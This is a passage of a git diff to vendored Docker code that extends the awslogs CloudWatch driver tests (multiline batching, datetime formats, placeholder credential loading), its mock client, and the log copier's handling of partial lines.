<-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal("xxxx "+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") +} + +func BenchmarkCollectBatch(b *testing.B) { + for i := 0; i < b.N; i++ { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + stream.logGenerator(10, 100) + ticks <- time.Time{} + stream.Close() + } +} + +func BenchmarkCollectBatchMultilinePattern(b *testing.B) { + for i := 0; i < b.N; i++ { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile(`\d{4}-(?:0[1-9]|1[0-2])-(?:0[1-9]|[1,2][0-9]|3[0,1]) (?:[0,1][0-9]|2[0-3]):[0-5][0-9]:[0-5][0-9]`) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + d := make(chan bool) + close(d) + go stream.collectBatch(d) + stream.logGenerator(10, 100) + ticks <- time.Time{} + stream.Close() + } +} + +func 
TestCollectBatchMultilinePatternMaxEventAge(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + + // Log an event 1 second later + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now().Add(time.Second), + }) + + // Fire ticker batchPublishFrequency seconds later + ticks <- time.Now().Add(batchPublishFrequency + time.Second) + + // Verify single multiline event is flushed after maximum event buffer age (batchPublishFrequency) + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + + // Log an event 1 second later + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now().Add(time.Second), + }) + + // Fire ticker another batchPublishFrequency seconds later + ticks <- time.Now().Add(2*batchPublishFrequency + time.Second) + + // Verify the event buffer is truly flushed - we should only receive a single event + argument = <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + 
assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + stream.Close() +} + +func TestCollectBatchMultilinePatternNegativeEventAge(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now(), + }) + + // Log an event 1 second later + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Now().Add(time.Second), + }) + + // Fire ticker in past to simulate negative event buffer age + ticks <- time.Now().Add(-time.Second) + + // Verify single multiline event is flushed with a negative event buffer age + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event") + assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message") + + stream.Close() +} + +func TestCollectBatchMultilinePatternMaxEventSize(t *testing.T) { + mockClient := newMockClient() + multilinePattern := regexp.MustCompile("xxxx") + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + 
multilinePattern: multilinePattern, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + d := make(chan bool) + close(d) + go stream.collectBatch(d) + + // Log max event size + longline := strings.Repeat("A", maximumBytesPerEvent) + stream.Log(&logger.Message{ + Line: []byte(longline), + Timestamp: time.Now(), + }) + + // Log short event + shortline := strings.Repeat("B", 100) + stream.Log(&logger.Message{ + Line: []byte(shortline), + Timestamp: time.Now(), + }) + + // Fire ticker + ticks <- time.Now().Add(batchPublishFrequency) + + // Verify multiline events + // We expect a maximum sized event with no new line characters and a + // second short event with a new line character at the end + argument := <-mockClient.putLogEventsArgument + assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput") + assert.Check(t, is.Equal(2, len(argument.LogEvents)), "Expected two events") + assert.Check(t, is.Equal(longline, *argument.LogEvents[0].Message), "Received incorrect multiline message") + assert.Check(t, is.Equal(shortline+"\n", *argument.LogEvents[1].Message), "Received incorrect multiline message") + stream.Close() +} + func TestCollectBatchClose(t *testing.T) { mockClient := newMockClient() stream := &logStream{ @@ -461,7 +903,9 @@ func TestCollectBatchClose(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) stream.Log(&logger.Message{ Line: []byte(logline), @@ -504,7 +948,9 @@ func TestCollectBatchLineSplit(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) longline := strings.Repeat("A", maximumBytesPerEvent) 
stream.Log(&logger.Message{ @@ -551,7 +997,9 @@ func TestCollectBatchMaxEvents(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) line := "A" for i := 0; i <= maximumLogEventsPerPut; i++ { @@ -582,7 +1030,8 @@ func TestCollectBatchMaxEvents(t *testing.T) { } func TestCollectBatchMaxTotalBytes(t *testing.T) { - mockClient := newMockClientBuffered(1) + expectedPuts := 2 + mockClient := newMockClientBuffered(expectedPuts) stream := &logStream{ client: mockClient, logGroupName: groupName, @@ -590,11 +1039,14 @@ func TestCollectBatchMaxTotalBytes(t *testing.T) { sequenceToken: aws.String(sequenceToken), messages: make(chan *logger.Message), } - mockClient.putLogEventsResult <- &putLogEventsResult{ - successResult: &cloudwatchlogs.PutLogEventsOutput{ - NextSequenceToken: aws.String(nextSequenceToken), - }, + for i := 0; i < expectedPuts; i++ { + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } } + var ticks = make(chan time.Time) newTicker = func(_ time.Duration) *time.Ticker { return &time.Ticker{ @@ -602,34 +1054,61 @@ func TestCollectBatchMaxTotalBytes(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) - longline := strings.Repeat("A", maximumBytesPerPut) + numPayloads := maximumBytesPerPut / (maximumBytesPerEvent + perEventBytes) + // maxline is the maximum line that could be submitted after + // accounting for its overhead. + maxline := strings.Repeat("A", maximumBytesPerPut-(perEventBytes*numPayloads)) + // This will be split and batched up to the `maximumBytesPerPut' + // (+/- `maximumBytesPerEvent'). This /should/ be aligned, but + // should also tolerate an offset within that range. 
stream.Log(&logger.Message{ - Line: []byte(longline + "B"), + Line: []byte(maxline[:len(maxline)/2]), + Timestamp: time.Time{}, + }) + stream.Log(&logger.Message{ + Line: []byte(maxline[len(maxline)/2:]), + Timestamp: time.Time{}, + }) + stream.Log(&logger.Message{ + Line: []byte("B"), Timestamp: time.Time{}, }) - // no ticks + // no ticks, guarantee batch by size (and chan close) stream.Close() argument := <-mockClient.putLogEventsArgument if argument == nil { t.Fatal("Expected non-nil PutLogEventsInput") } - bytes := 0 + + // Should total to the maximum allowed bytes. + eventBytes := 0 for _, event := range argument.LogEvents { - bytes += len(*event.Message) + eventBytes += len(*event.Message) + } + eventsOverhead := len(argument.LogEvents) * perEventBytes + payloadTotal := eventBytes + eventsOverhead + // lowestMaxBatch allows the payload to be offset if the messages + // don't lend themselves to align with the maximum event size. + lowestMaxBatch := maximumBytesPerPut - maximumBytesPerEvent + + if payloadTotal > maximumBytesPerPut { + t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, payloadTotal) } - if bytes > maximumBytesPerPut { - t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, bytes) + if payloadTotal < lowestMaxBatch { + t.Errorf("Batch to be no less than %d but was %d", lowestMaxBatch, payloadTotal) } argument = <-mockClient.putLogEventsArgument if len(argument.LogEvents) != 1 { t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents)) } - message := *argument.LogEvents[0].Message + message := *argument.LogEvents[len(argument.LogEvents)-1].Message if message[len(message)-1:] != "B" { t.Errorf("Expected message to be %s but was %s", "B", message[len(message)-1:]) } @@ -656,10 +1135,12 @@ func TestCollectBatchWithDuplicateTimestamps(t *testing.T) { } } - go stream.collectBatch() + d := make(chan bool) + close(d) + go stream.collectBatch(d) + var expectedEvents 
[]*cloudwatchlogs.InputLogEvent times := maximumLogEventsPerPut - expectedEvents := []*cloudwatchlogs.InputLogEvent{} timestamp := time.Now() for i := 0; i < times; i++ { line := fmt.Sprintf("%d", i) @@ -693,14 +1174,66 @@ func TestCollectBatchWithDuplicateTimestamps(t *testing.T) { } } +func TestParseLogOptionsMultilinePattern(t *testing.T) { + info := logger.Info{ + Config: map[string]string{ + multilinePatternKey: "^xxxx", + }, + } + + multilinePattern, err := parseMultilineOptions(info) + assert.Check(t, err, "Received unexpected error") + assert.Check(t, multilinePattern.MatchString("xxxx"), "No multiline pattern match found") +} + +func TestParseLogOptionsDatetimeFormat(t *testing.T) { + datetimeFormatTests := []struct { + format string + match string + }{ + {"%d/%m/%y %a %H:%M:%S%L %Z", "31/12/10 Mon 08:42:44.345 NZDT"}, + {"%Y-%m-%d %A %I:%M:%S.%f%p%z", "2007-12-04 Monday 08:42:44.123456AM+1200"}, + {"%b|%b|%b|%b|%b|%b|%b|%b|%b|%b|%b|%b", "Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec"}, + {"%B|%B|%B|%B|%B|%B|%B|%B|%B|%B|%B|%B", "January|February|March|April|May|June|July|August|September|October|November|December"}, + {"%A|%A|%A|%A|%A|%A|%A", "Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday"}, + {"%a|%a|%a|%a|%a|%a|%a", "Mon|Tue|Wed|Thu|Fri|Sat|Sun"}, + {"Day of the week: %w, Day of the year: %j", "Day of the week: 4, Day of the year: 091"}, + } + for _, dt := range datetimeFormatTests { + t.Run(dt.match, func(t *testing.T) { + info := logger.Info{ + Config: map[string]string{ + datetimeFormatKey: dt.format, + }, + } + multilinePattern, err := parseMultilineOptions(info) + assert.Check(t, err, "Received unexpected error") + assert.Check(t, multilinePattern.MatchString(dt.match), "No multiline pattern match found") + }) + } +} + +func TestValidateLogOptionsDatetimeFormatAndMultilinePattern(t *testing.T) { + cfg := map[string]string{ + multilinePatternKey: "^xxxx", + datetimeFormatKey: "%Y-%m-%d", + logGroupKey: groupName, + } + 
conflictingLogOptionsError := "you cannot configure log opt 'awslogs-datetime-format' and 'awslogs-multiline-pattern' at the same time" + + err := ValidateLogOpt(cfg) + assert.Check(t, err != nil, "Expected an error") + assert.Check(t, is.Equal(err.Error(), conflictingLogOptionsError), "Received invalid error") +} + func TestCreateTagSuccess(t *testing.T) { mockClient := newMockClient() - ctx := logger.Context{ + info := logger.Info{ ContainerName: "/test-container", ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", Config: map[string]string{"tag": "{{.Name}}/{{.FullID}}"}, } - logStreamName, e := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + logStreamName, e := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if e != nil { t.Errorf("Error generating tag: %q", e) } @@ -722,3 +1255,137 @@ func TestCreateTagSuccess(t *testing.T) { t.Errorf("Expected LogStreamName to be %s", "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890") } } + +func BenchmarkUnwrapEvents(b *testing.B) { + events := make([]wrappedEvent, maximumLogEventsPerPut) + for i := 0; i < maximumLogEventsPerPut; i++ { + mes := strings.Repeat("0", maximumBytesPerEvent) + events[i].inputLogEvent = &cloudwatchlogs.InputLogEvent{ + Message: &mes, + } + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + res := unwrapEvents(events) + assert.Check(b, is.Len(res, maximumLogEventsPerPut)) + } +} + +func TestNewAWSLogsClientCredentialEndpointDetect(t *testing.T) { + // required for the cloudwatchlogs client + os.Setenv("AWS_REGION", "us-west-2") + defer os.Unsetenv("AWS_REGION") + + credsResp := `{ + "AccessKeyId" : "test-access-key-id", + "SecretAccessKey": "test-secret-access-key" + }` + + expectedAccessKeyID := "test-access-key-id" + expectedSecretAccessKey := "test-secret-access-key" + + testServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + fmt.Fprintln(w, 
credsResp) + })) + defer testServer.Close() + + // set the SDKEndpoint in the driver + newSDKEndpoint = testServer.URL + + info := logger.Info{ + Config: map[string]string{}, + } + + info.Config["awslogs-credentials-endpoint"] = "/creds" + + c, err := newAWSLogsClient(info) + assert.Check(t, err) + + client := c.(*cloudwatchlogs.CloudWatchLogs) + + creds, err := client.Config.Credentials.Get() + assert.Check(t, err) + + assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID)) + assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey)) +} + +func TestNewAWSLogsClientCredentialEnvironmentVariable(t *testing.T) { + // required for the cloudwatchlogs client + os.Setenv("AWS_REGION", "us-west-2") + defer os.Unsetenv("AWS_REGION") + + expectedAccessKeyID := "test-access-key-id" + expectedSecretAccessKey := "test-secret-access-key" + + os.Setenv("AWS_ACCESS_KEY_ID", expectedAccessKeyID) + defer os.Unsetenv("AWS_ACCESS_KEY_ID") + + os.Setenv("AWS_SECRET_ACCESS_KEY", expectedSecretAccessKey) + defer os.Unsetenv("AWS_SECRET_ACCESS_KEY") + + info := logger.Info{ + Config: map[string]string{}, + } + + c, err := newAWSLogsClient(info) + assert.Check(t, err) + + client := c.(*cloudwatchlogs.CloudWatchLogs) + + creds, err := client.Config.Credentials.Get() + assert.Check(t, err) + + assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID)) + assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey)) + +} + +func TestNewAWSLogsClientCredentialSharedFile(t *testing.T) { + // required for the cloudwatchlogs client + os.Setenv("AWS_REGION", "us-west-2") + defer os.Unsetenv("AWS_REGION") + + expectedAccessKeyID := "test-access-key-id" + expectedSecretAccessKey := "test-secret-access-key" + + contentStr := ` + [default] + aws_access_key_id = "test-access-key-id" + aws_secret_access_key = "test-secret-access-key" + ` + content := []byte(contentStr) + + tmpfile, err := ioutil.TempFile("", "example") + defer os.Remove(tmpfile.Name()) // 
clean up + assert.Check(t, err) + + _, err = tmpfile.Write(content) + assert.Check(t, err) + + err = tmpfile.Close() + assert.Check(t, err) + + os.Unsetenv("AWS_ACCESS_KEY_ID") + os.Unsetenv("AWS_SECRET_ACCESS_KEY") + + os.Setenv("AWS_SHARED_CREDENTIALS_FILE", tmpfile.Name()) + defer os.Unsetenv("AWS_SHARED_CREDENTIALS_FILE") + + info := logger.Info{ + Config: map[string]string{}, + } + + c, err := newAWSLogsClient(info) + assert.Check(t, err) + + client := c.(*cloudwatchlogs.CloudWatchLogs) + + creds, err := client.Config.Credentials.Get() + assert.Check(t, err) + + assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID)) + assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey)) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go index b768a3d7ec..155e602b8c 100644 --- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go @@ -1,14 +1,25 @@ -package awslogs +package awslogs // import "github.com/docker/docker/daemon/logger/awslogs" -import "github.com/aws/aws-sdk-go/service/cloudwatchlogs" +import ( + "fmt" + + "github.com/aws/aws-sdk-go/service/cloudwatchlogs" +) type mockcwlogsclient struct { + createLogGroupArgument chan *cloudwatchlogs.CreateLogGroupInput + createLogGroupResult chan *createLogGroupResult createLogStreamArgument chan *cloudwatchlogs.CreateLogStreamInput createLogStreamResult chan *createLogStreamResult putLogEventsArgument chan *cloudwatchlogs.PutLogEventsInput putLogEventsResult chan *putLogEventsResult } +type createLogGroupResult struct { + successResult *cloudwatchlogs.CreateLogGroupOutput + errorResult error +} + type createLogStreamResult struct { successResult *cloudwatchlogs.CreateLogStreamOutput errorResult error @@ -21,6 +32,8 @@ type putLogEventsResult struct { func 
newMockClient() *mockcwlogsclient { return &mockcwlogsclient{ + createLogGroupArgument: make(chan *cloudwatchlogs.CreateLogGroupInput, 1), + createLogGroupResult: make(chan *createLogGroupResult, 1), createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, 1), createLogStreamResult: make(chan *createLogStreamResult, 1), putLogEventsArgument: make(chan *cloudwatchlogs.PutLogEventsInput, 1), @@ -37,6 +50,12 @@ func newMockClientBuffered(buflen int) *mockcwlogsclient { } } +func (m *mockcwlogsclient) CreateLogGroup(input *cloudwatchlogs.CreateLogGroupInput) (*cloudwatchlogs.CreateLogGroupOutput, error) { + m.createLogGroupArgument <- input + output := <-m.createLogGroupResult + return output.successResult, output.errorResult +} + func (m *mockcwlogsclient) CreateLogStream(input *cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) { m.createLogStreamArgument <- input output := <-m.createLogStreamResult @@ -52,7 +71,30 @@ func (m *mockcwlogsclient) PutLogEvents(input *cloudwatchlogs.PutLogEventsInput) LogGroupName: input.LogGroupName, LogStreamName: input.LogStreamName, } + + // Intended mock output output := <-m.putLogEventsResult + + // Checked enforced limits in mock + totalBytes := 0 + for _, evt := range events { + if evt.Message == nil { + continue + } + eventBytes := len([]byte(*evt.Message)) + if eventBytes > maximumBytesPerEvent { + // exceeded per event message size limits + return nil, fmt.Errorf("maximum bytes per event exceeded: Event too large %d, max allowed: %d", eventBytes, maximumBytesPerEvent) + } + // total event bytes including overhead + totalBytes += eventBytes + perEventBytes + } + + if totalBytes > maximumBytesPerPut { + // exceeded per put maximum size limit + return nil, fmt.Errorf("maximum bytes per put exceeded: Upload too large %d, max allowed: %d", totalBytes, maximumBytesPerPut) + } + return output.successResult, output.errorResult } diff --git 
a/vendor/github.com/docker/docker/daemon/logger/copier.go b/vendor/github.com/docker/docker/daemon/logger/copier.go index 10ab46e162..e24272fa6d 100644 --- a/vendor/github.com/docker/docker/daemon/logger/copier.go +++ b/vendor/github.com/docker/docker/daemon/logger/copier.go @@ -1,4 +1,4 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "bytes" @@ -6,12 +6,19 @@ import ( "sync" "time" - "github.com/Sirupsen/logrus" + types "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/pkg/stringid" + "github.com/sirupsen/logrus" ) const ( - bufSize = 16 * 1024 + // readSize is the maximum bytes read during a single read + // operation. readSize = 2 * 1024 + + // defaultBufSize provides a reasonable default for loggers that do + // not have an external limit to impose on log line size. + defaultBufSize = 16 * 1024 ) // Copier can copy logs from specified sources to Logger and attach Timestamp. @@ -44,10 +51,20 @@ func (c *Copier) Run() { func (c *Copier) copySrc(name string, src io.Reader) { defer c.copyJobs.Done() + + bufSize := defaultBufSize + if sizedLogger, ok := c.dst.(SizedLogger); ok { + bufSize = sizedLogger.BufSize() + } buf := make([]byte, bufSize) + n := 0 eof := false - msg := &Message{Source: name} + var partialid string + var partialTS time.Time + var ordinal int + firstPartial := true + hasMorePartial := false for { select { @@ -64,6 +81,7 @@ func (c *Copier) copySrc(name string, src io.Reader) { read, err := src.Read(buf[n:upto]) if err != nil { if err != io.EOF { + logReadsFailedCount.Inc(1) logrus.Errorf("Error scanning log stream: %s", err) return } @@ -77,15 +95,33 @@ func (c *Copier) copySrc(name string, src io.Reader) { } // Break up the data that we've buffered up into lines, and log each in turn. 
p := 0 - for q := bytes.Index(buf[p:n], []byte{'\n'}); q >= 0; q = bytes.Index(buf[p:n], []byte{'\n'}) { - msg.Line = buf[p : p+q] - msg.Timestamp = time.Now().UTC() - msg.Partial = false + + for q := bytes.IndexByte(buf[p:n], '\n'); q >= 0; q = bytes.IndexByte(buf[p:n], '\n') { select { case <-c.closed: return default: + msg := NewMessage() + msg.Source = name + msg.Line = append(msg.Line, buf[p:p+q]...) + + if hasMorePartial { + msg.PLogMetaData = &types.PartialLogMetaData{ID: partialid, Ordinal: ordinal, Last: true} + + // reset + partialid = "" + ordinal = 0 + firstPartial = true + hasMorePartial = false + } + if msg.PLogMetaData == nil { + msg.Timestamp = time.Now().UTC() + } else { + msg.Timestamp = partialTS + } + if logErr := c.dst.Log(msg); logErr != nil { + logWritesFailedCount.Inc(1) logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) } } @@ -96,10 +132,29 @@ func (c *Copier) copySrc(name string, src io.Reader) { // noting that it's a partial log line. if eof || (p == 0 && n == len(buf)) { if p < n { - msg.Line = buf[p:n] - msg.Timestamp = time.Now().UTC() - msg.Partial = true + msg := NewMessage() + msg.Source = name + msg.Line = append(msg.Line, buf[p:n]...) + + // Generate unique partialID for first partial. Use it across partials. + // Record timestamp for first partial. Use it across partials. + // Initialize Ordinal for first partial. Increment it across partials. 
+ if firstPartial { + msg.Timestamp = time.Now().UTC() + partialTS = msg.Timestamp + partialid = stringid.GenerateRandomID() + ordinal = 1 + firstPartial = false + totalPartialLogs.Inc(1) + } else { + msg.Timestamp = partialTS + } + msg.PLogMetaData = &types.PartialLogMetaData{ID: partialid, Ordinal: ordinal, Last: false} + ordinal++ + hasMorePartial = true + if logErr := c.dst.Log(msg); logErr != nil { + logWritesFailedCount.Inc(1) logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr) } p = 0 diff --git a/vendor/github.com/docker/docker/daemon/logger/copier_test.go b/vendor/github.com/docker/docker/daemon/logger/copier_test.go index cfd816a6eb..d09450bd19 100644 --- a/vendor/github.com/docker/docker/daemon/logger/copier_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/copier_test.go @@ -1,4 +1,4 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "bytes" @@ -31,6 +31,25 @@ func (l *TestLoggerJSON) Close() error { return nil } func (l *TestLoggerJSON) Name() string { return "json" } +type TestSizedLoggerJSON struct { + *json.Encoder + mu sync.Mutex +} + +func (l *TestSizedLoggerJSON) Log(m *Message) error { + l.mu.Lock() + defer l.mu.Unlock() + return l.Encode(m) +} + +func (*TestSizedLoggerJSON) Close() error { return nil } + +func (*TestSizedLoggerJSON) Name() string { return "sized-json" } + +func (*TestSizedLoggerJSON) BufSize() int { + return 32 * 1024 +} + func TestCopier(t *testing.T) { stdoutLine := "Line that thinks that it is log line from docker stdout" stderrLine := "Line that thinks that it is log line from docker stderr" @@ -104,10 +123,9 @@ func TestCopier(t *testing.T) { // TestCopierLongLines tests long lines without line breaks func TestCopierLongLines(t *testing.T) { - // Long lines (should be split at "bufSize") - const bufSize = 16 * 1024 - stdoutLongLine := strings.Repeat("a", bufSize) - stderrLongLine := strings.Repeat("b", bufSize) + // Long lines (should 
be split at "defaultBufSize") + stdoutLongLine := strings.Repeat("a", defaultBufSize) + stderrLongLine := strings.Repeat("b", defaultBufSize) stdoutTrailingLine := "stdout trailing line" stderrTrailingLine := "stderr trailing line" @@ -200,15 +218,185 @@ func TestCopierSlow(t *testing.T) { c.Close() select { case <-time.After(200 * time.Millisecond): - t.Fatalf("failed to exit in time after the copier is closed") + t.Fatal("failed to exit in time after the copier is closed") case <-wait: } } +func TestCopierWithSized(t *testing.T) { + var jsonBuf bytes.Buffer + expectedMsgs := 2 + sizedLogger := &TestSizedLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + logbuf := bytes.NewBufferString(strings.Repeat(".", sizedLogger.BufSize()*expectedMsgs)) + c := NewCopier(map[string]io.Reader{"stdout": logbuf}, sizedLogger) + + c.Run() + // Wait for Copier to finish writing to the buffered logger. + c.Wait() + c.Close() + + recvdMsgs := 0 + dec := json.NewDecoder(&jsonBuf) + for { + var msg Message + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" { + t.Fatalf("Wrong Source: %q, should be %q", msg.Source, "stdout") + } + if len(msg.Line) != sizedLogger.BufSize() { + t.Fatalf("Line was not of expected max length %d, was %d", sizedLogger.BufSize(), len(msg.Line)) + } + recvdMsgs++ + } + if recvdMsgs != expectedMsgs { + t.Fatalf("expected to receive %d messages, actually received %d", expectedMsgs, recvdMsgs) + } +} + +func checkIdentical(t *testing.T, msg Message, expectedID string, expectedTS time.Time) { + if msg.PLogMetaData.ID != expectedID { + t.Fatalf("IDs are not he same across partials. Expected: %s Received: %s", + expectedID, msg.PLogMetaData.ID) + } + if msg.Timestamp != expectedTS { + t.Fatalf("Timestamps are not the same across partials. 
Expected: %v Received: %v", + expectedTS.Format(time.UnixDate), msg.Timestamp.Format(time.UnixDate)) + } +} + +// Have long lines and make sure that it comes out with PartialMetaData +func TestCopierWithPartial(t *testing.T) { + stdoutLongLine := strings.Repeat("a", defaultBufSize) + stderrLongLine := strings.Repeat("b", defaultBufSize) + stdoutTrailingLine := "stdout trailing line" + stderrTrailingLine := "stderr trailing line" + normalStr := "This is an impartial message :)" + + var stdout bytes.Buffer + var stderr bytes.Buffer + var normalMsg bytes.Buffer + + for i := 0; i < 3; i++ { + if _, err := stdout.WriteString(stdoutLongLine); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrLongLine); err != nil { + t.Fatal(err) + } + } + + if _, err := stdout.WriteString(stdoutTrailingLine + "\n"); err != nil { + t.Fatal(err) + } + if _, err := stderr.WriteString(stderrTrailingLine + "\n"); err != nil { + t.Fatal(err) + } + if _, err := normalMsg.WriteString(normalStr + "\n"); err != nil { + t.Fatal(err) + } + + var jsonBuf bytes.Buffer + + jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)} + + c := NewCopier( + map[string]io.Reader{ + "stdout": &stdout, + "normal": &normalMsg, + "stderr": &stderr, + }, + jsonLog) + c.Run() + wait := make(chan struct{}) + go func() { + c.Wait() + close(wait) + }() + select { + case <-time.After(1 * time.Second): + t.Fatal("Copier failed to do its work in 1 second") + case <-wait: + } + + dec := json.NewDecoder(&jsonBuf) + expectedMsgs := 9 + recvMsgs := 0 + var expectedPartID1, expectedPartID2 string + var expectedTS1, expectedTS2 time.Time + + for { + var msg Message + + if err := dec.Decode(&msg); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if msg.Source != "stdout" && msg.Source != "stderr" && msg.Source != "normal" { + t.Fatalf("Wrong Source: %q, should be %q or %q or %q", msg.Source, "stdout", "stderr", "normal") + } + + if msg.Source == "stdout" { + if string(msg.Line) != 
